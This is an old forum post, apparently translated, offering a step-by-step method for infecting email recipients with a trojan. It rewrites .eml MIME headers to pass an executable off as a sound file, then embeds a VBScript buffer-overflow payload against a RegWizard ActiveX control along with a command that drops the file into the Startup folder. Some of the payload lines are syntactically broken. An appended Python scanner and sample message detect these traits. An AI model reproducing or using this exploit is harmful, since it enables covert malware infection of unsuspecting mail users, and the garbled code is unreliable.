Mapcon
03-09-2002, 06:04 PM
NOTE: This is only the basic method; how much "damage" is done depends on your own "bug"! ... If anyone has a better way, post it so everyone can admire it!!!! (Mapcon)
"Badblood" is a tool that makes it easier to get a victim infected with (your) trojan by way of email.
Badblood is a new term discovered by Marklord; this discovery lets us run attached files in a mail, and in particular the user cannot tell that it is happening.
Badblood uses a hidden script. It affects not only Outlook Express but everyone using IE 5.0 with the bundled Outlook Express (installed along with Windows), on Windows 95 or Windows 98.
Even people using mail clients such as Netscape Messenger (I have not tested Eudora), etc., will all be infected if they open the *.eml file that I am about to show you how to create. You can also infect users of Hotmail or HTML mail, but note that they *must* open the *.eml file to be infected (:<
Step 1 (very important):
We have to go to Internet Explorer -> Option -> Security tab, click Custom Level, and turn off (disable) all the functions that allow scripts to run (otherwise your own machine will be infected).
Step 2:
Prepare a virus, trojan, backdoor, etc., and an editing program such as EditPlus or TextPad.
Step 3:
+ Run Outlook Express, click New Message -> Format -> Background -> Picture (or Sound) (the file ding.wav, for example).
+ Attach a trojan or virus file as well, using the Attach button (name it file.exe, for example).
+ Save this email to some folder on the hard disk.
Step 4:
Use EditPlus or TextPad, or any other text-editing program, to open this *.eml file. The source of the file will contain lines like the ones below.
Cut the following lines:
Content-position: attachment;
filename="file.exe"
- And paste them into the section that describes the file ding.wav; it will look like this:
Content-Type: audio/wav;
name="Ding.wav"
Content-Transfer-Encoding: base64
Content-position: attachment; {Note: these 2 lines look like this only once they have been pasted in}
filename="file.exe"
- Next, in the section that describes the ding.wav attachment, cut the following Content-ID line:
Content-ID: <002801bf41c9$95325940$0100007f@computername>
- paste it into the section that describes the file.exe attachment. It will look like this:
Content-Type: application/x-msdownload;
name="file.exe"
Content-Transfer-Encoding: base64
Content-ID: <002801bf41c9$95325940$0100007f@computername>
- Then save the *.eml file you have just edited and run it. In the attachment area you will see the name [file.exe], but this is not actually the real trojan file.exe (look at its size again: its size equals the size of the ding.wav file!)
Remove this file.exe by right-clicking it and choosing Remove.
- Now go to View, or press Alt + V, and tick Source Edit. You will see OE show 3 buttons, Edit, Source and Preview, at the bottom of the message. You are in Edit, so click Source and paste in the following script:
<object classid="clsid:50E5E3D1-C07E-11D0-B9FD-00A0249F6B00"
id="RegWizObj"></object>
<script language="VbScript" >
expstr = "/i
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAA"
expstr = expstr & Chr(235)
expstr = expstr & Chr(53)
expstr = expstr & Chr(20
expstr = expstr & Chr(127)
expstr = expstr + Chr(144)
expstr = expstr + Chr(139) + Chr(252)
expstr = expstr + Chr(131) + Chr(199) + Chr(25)
expstr = expstr + Chr(80)
expstr = expstr + Chr(87)
expstr = expstr + Chr(186) + Chr(96) + Chr(9) + Chr(250) + Chr(191)
expstr = expstr + Chr(255) + Chr(210)
expstr = expstr + Chr(51) + Chr(192)
expstr = expstr + Chr(80)
expstr = expstr + Chr(186) + Chr(202) + Chr(212) + Chr(24 +
Chr(191)
expstr = expstr + Chr(255) + Chr(210)
expstr = expstr + "move c:windowstempd*.tmp
c:windowsstartm~1programsstartupfile.exe"
RegWizObj.InvokeRegWizard(expstr)
</script>
- Save the changes you have just made. That is all; you can now send it to the victims.
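For mail filtering or triage, the message layout this post describes can be checked mechanically: a media part whose attachment filename ends in .exe, an executable part that carries a Content-ID, and an HTML body that instantiates the control with the CLSID quoted above. The following is an added example, not part of the original post; `scan_eml`, the finding tags, the extension list and the constructed sample message are assumptions, and the sample uses the standard Content-Disposition header name.

```python
import email
from email import policy
# CLSID taken from the <object> tag in the post; the extension list is an assumption.
REGWIZ_CLSID = "50e5e3d1-c07e-11d0-b9fd-00a0249f6b00"
EXEC_EXT = (".exe", ".scr", ".pif", ".com", ".bat", ".vbs")

def scan_eml(raw):
    """Return sorted finding tags for one raw message given as bytes."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    found = set()
    for part in msg.walk():
        if part.is_multipart():
            continue
        ctype = part.get_content_type()
        fname = (part.get_filename() or "").lower()
        is_exec = ctype == "application/x-msdownload" or fname.endswith(EXEC_EXT)
        # Displayed filename is executable while the part claims to be media or text.
        if fname.endswith(EXEC_EXT) and part.get_content_maintype() in ("audio", "image", "video", "text"):
            found.add("type-mismatch")
        # Executable part addressed by Content-ID rather than listed as an attachment.
        if is_exec and part["Content-ID"] and part.get_content_disposition() != "attachment":
            found.add("inline-executable")
        if ctype == "text/html":
            html = part.get_payload(decode=True).decode("latin-1").lower()
            if "<object" in html and "classid" in html:
                found.add("regwiz-object" if REGWIZ_CLSID in html else "activex-object")
    return sorted(found)

# Constructed sample: headers mirror the layout described above, bodies are dummy bytes.
SAMPLE = b"""MIME-Version: 1.0
Content-Type: multipart/related; boundary="b1"

--b1
Content-Type: text/html; charset="us-ascii"

<html><object classid="clsid:50E5E3D1-C07E-11D0-B9FD-00A0249F6B00"></object></html>
--b1
Content-Type: audio/wav; name="Ding.wav"
Content-Disposition: attachment; filename="file.exe"

AAAA
--b1
Content-Type: application/x-msdownload; name="file.exe"
Content-ID: <cid1@example.test>

AAAA
--b1--
"""
if __name__ == "__main__":
    print(scan_eml(SAMPLE))
```

Any one of the three tags is enough to quarantine a message for review; the `activex-object` tag covers HTML mail that embeds a different control.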